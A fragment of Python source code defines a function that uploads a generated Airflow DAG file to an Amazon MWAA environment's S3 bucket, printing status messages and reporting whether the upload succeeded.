    target: TargetConfig,
    dag_code: str,
    dag_filename: str,
) -> bool:
    """Upload a generated DAG to the target MWAA S3 bucket."""
    print_section("DAG Deployment")

    if not target.s3_dag_bucket:
        print_fail("No S3 DAG bucket specified in target config.")
        return False

    s3 = get_s3_client(target.region, target.profile)
    s3_key = f"{target.s3_dag_prefix}{dag_filename}"

    print_info(f"Bucket: {target.s3_dag_bucket}")
    print_info(f"Key:    {s3_key}")

    try:
        s3.put_object(
            Bucket=target.s3_dag_bucket,
            Key=s3_key,
            Body=dag_code.encode("utf-8"),
            ContentType="text/x-python",
        )
        print_success(f"DAG uploaded: s3://{target.s3_dag_bucket}/{s3_key}")
        print_info("MWAA will pick up the DAG on its next scan interval.")
        return True

    except Exception as e:
        print_fail(f"Upload failed: {e}")
        return False


